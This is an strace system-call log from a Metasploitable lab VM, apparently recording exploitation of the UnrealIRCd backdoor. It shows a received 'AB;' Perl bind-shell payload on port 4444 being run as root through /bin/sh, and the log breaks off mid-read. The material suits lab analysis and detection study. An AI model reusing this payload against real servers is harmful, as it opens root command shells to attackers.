4519  07:33:02.147025 select(1024, [2 3 4 7 9], [], NULL, {0, 980000}) = 1 (in [9], left {0, 960000})

4519  07:33:02.158469 clock_gettime(CLOCK_MONOTONIC, {2391, 975478633}) = 0

4519  07:33:02.158470 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:33:02.158497 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158516 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158531 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158545 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158558 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158573 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158586 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158600 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158613 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158627 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158640 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158654 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158667 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158681 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158694 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158707 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158721 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158734 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158747 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158761 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158790 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158831 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.158848 gettimeofday({1495625582, 158869}, NULL) = 0

4519  07:33:02.158877 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 820000})

4519  07:33:02.341802 clock_gettime(CLOCK_MONOTONIC, {2392, 158823354}) = 0

4519  07:33:02.341823 time(NULL)        = 1495625582

4519  07:33:02.341833 time(NULL)        = 1495625582

4519  07:33:02.341846 gettimeofday({1495625582, 341849}, NULL) = 0

4519  07:33:02.341857 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:33:02.341897 clock_gettime(CLOCK_MONOTONIC, {2392, 158909858}) = 0

4519  07:33:02.341907 gettimeofday({1495625582, 341911}, NULL) = 0

4519  07:33:02.341918 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:33:02.341957 clock_gettime(CLOCK_MONOTONIC, {2392, 158969357}) = 0

4519  07:33:02.341968 accept(2, 0, NULL) = 5

4519  07:33:02.341989 getpeername(5, {sa_family=AF_INET, sin_port=htons(41247), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:33:02.342020 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:33:02.342033 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:33:02.342046 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:33:02.342058 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:33:02.342070 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:33:02.342081 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:33:02.342093 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:33:02.342156 clock_gettime(CLOCK_MONOTONIC, {2392, 159171998}) = 0

4519  07:33:02.342171 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:33:02.342183 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:33:02.342231 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:33:02.342267 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:33:02.342278 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:33:02.342309 send(6, "\255T\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:33:02.342359 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:33:02.342407 gettimeofday({1495625582, 342411}, NULL) = 0

4519  07:33:02.342433 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:33:02.347585 clock_gettime(CLOCK_MONOTONIC, {2392, 164618525}) = 0

4519  07:33:02.347619 recvfrom(6, "\255T\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1 \0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:33:02.347659 close(6)          = 0

4519  07:33:02.347675 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:33:02.347689 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:33:02.347748 time(NULL)        = 1495625582

4519  07:33:02.347798 time(NULL)        = 1495625582

4519  07:33:02.347825 gettimeofday({1495625582, 347829}, NULL) = 0

4519  07:33:02.347837 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:33:02.347882 clock_gettime(CLOCK_MONOTONIC, {2392, 164949932}) = 0

4519  07:33:02.347949 gettimeofday({1495625582, 347952}, NULL) = 0

4519  07:33:02.347959 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 640000})

4519  07:33:02.698501 clock_gettime(CLOCK_MONOTONIC, {2392, 515523351}) = 0

4519  07:33:02.698525 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:33:02.698551 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698569 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698583 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698598 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698611 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698625 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698639 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698653 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698666 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698680 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698693 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698707 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698720 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698734 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698747 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698761 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698774 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698788 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698801 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698815 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698835 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698881 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:02.698901 gettimeofday({1495625582, 698905}, NULL) = 0

4519  07:33:02.698913 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:33:02.698969 clock_gettime(CLOCK_MONOTONIC, {2392, 515982375}) = 0

4519  07:33:02.698981 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:33:02.699010 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:33:02.699030 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:33:02.699043 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:33:02.699058 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10444

10444 07:33:02.708750 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10444 07:33:02.708750 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10444 07:33:02.708750 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10444 07:33:02.708750 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10444 07:33:02.708751 brk(0)            = 0x80f9000

10444 07:33:02.708751 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.708751 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3d000

10444 07:33:02.708756 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.708775 open("/etc/ld.so.cache", O_RDONLY) = 1

10444 07:33:02.708788 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10444 07:33:02.708807 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f35000

10444 07:33:02.708817 close(1)          = 0

10444 07:33:02.708828 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.708843 open("/lib/libncurses.so.5", O_RDONLY) = 1

10444 07:33:02.708856 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10444 07:33:02.709007 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10444 07:33:02.709026 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f05000

10444 07:33:02.709039 mmap2(0xb7f32000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f32000

10444 07:33:02.709056 close(1)          = 0

10444 07:33:02.709069 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.709096 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10444 07:33:02.709116 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10444 07:33:02.709206 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10444 07:33:02.709223 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f01000

10444 07:33:02.709235 mmap2(0xb7f03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f03000

10444 07:33:02.709251 close(1)          = 0

10444 07:33:02.709262 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.709275 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10444 07:33:02.709289 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10444 07:33:02.709378 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10444 07:33:02.709428 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f00000

10444 07:33:02.709444 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db1000

10444 07:33:02.709469 mmap2(0xb7efa000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7efa000

10444 07:33:02.709484 mmap2(0xb7efd000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

10444 07:33:02.709498 close(1)          = 0

10444 07:33:02.709520 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db0000

10444 07:33:02.709532 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db06b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10444 07:33:02.709588 mprotect(0xb7efa000, 4096, PROT_READ) = 0

10444 07:33:02.709625 munmap(0xb7f35000, 29913) = 0

10444 07:33:02.709651 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10444 07:33:02.709665 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10444 07:33:02.709685 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa383f0) = -1 ENOTTY (Inappropriate ioctl for device)

10444 07:33:02.709719 brk(0)            = 0x80f9000

10444 07:33:02.709729 brk(0x80fa000)    = 0x80fa000

10444 07:33:02.709740 brk(0x80fb000)    = 0x80fb000

10444 07:33:02.709756 getuid32()        = 0

10444 07:33:02.709766 getgid32()        = 0

10444 07:33:02.709775 geteuid32()       = 0

10444 07:33:02.709784 getegid32()       = 0

10444 07:33:02.709797 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10444 07:33:02.709811 time(NULL)        = 1495625582

10444 07:33:02.709823 brk(0x80fc000)    = 0x80fc000

10444 07:33:02.709837 brk(0x80fd000)    = 0x80fd000

10444 07:33:02.709857 open("/proc/meminfo", O_RDONLY) = 1

10444 07:33:02.709885 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10444 07:33:02.709932 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000

10444 07:33:02.709945 read(1, "MemTotal:      1035240 kB\nMemFree:        415152 kB\nBuffers:         77472 kB\nCached:         383208 kB\nSwapCached:          0 kB\nActive:         256420 kB\nInactive:       333192 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        414912 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4648 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            19208 kB\nSReclaimable:    10640 kB\nSUnreclaim:       8568 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10444 07:33:02.710044 close(1)          = 0

10444 07:33:02.710056 munmap(0xb7f3c000, 4096) = 0

10444 07:33:02.710067 brk(0x80fe000)    = 0x80fe000

10444 07:33:02.710094 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10444 07:33:02.710107 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10444 07:33:02.710119 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10444 07:33:02.710131 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10444 07:33:02.710142 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10444 07:33:02.710154 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10444 07:33:02.710168 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10444 07:33:02.710179 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10444 07:33:02.710192 uname({sys="Linux", node="metasploitable", ...}) = 0

10444 07:33:02.710241 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10444 07:33:02.710259 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10444 07:33:02.710277 brk(0x8100000)    = 0x8100000

10444 07:33:02.710289 getcwd("/etc/unreal", 4096) = 12

10444 07:33:02.710303 getpid()          = 10444

10444 07:33:02.710319 getppid()         = 4519

10444 07:33:02.710335 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10444 07:33:02.710355 stat64("/sbin/sh", 0xbfa383c8) = -1 ENOENT (No such file or directory)

10444 07:33:02.710367 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10444 07:33:02.710376 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10444 07:33:02.710377 socket(PF_FILE, SOCK_STREAM, 0) = 1

10444 07:33:02.710377 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10444 07:33:02.710377 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10444 07:33:02.710389 close(1)          = 0

10444 07:33:02.710401 socket(PF_FILE, SOCK_STREAM, 0) = 1

10444 07:33:02.710411 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10444 07:33:02.710421 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10444 07:33:02.710439 close(1)          = 0

10444 07:33:02.710453 open("/etc/nsswitch.conf", O_RDONLY) = 1

10444 07:33:02.710467 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10444 07:33:02.710483 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000

10444 07:33:02.710498 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10444 07:33:02.710547 read(1, "", 4096) = 0

10444 07:33:02.710557 close(1)          = 0

10444 07:33:02.710566 munmap(0xb7f3c000, 4096) = 0

10444 07:33:02.710583 open("/etc/ld.so.cache", O_RDONLY) = 1

10444 07:33:02.710595 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10444 07:33:02.710611 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f35000

10444 07:33:02.710622 close(1)          = 0

10444 07:33:02.710632 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.710647 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10444 07:33:02.710662 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 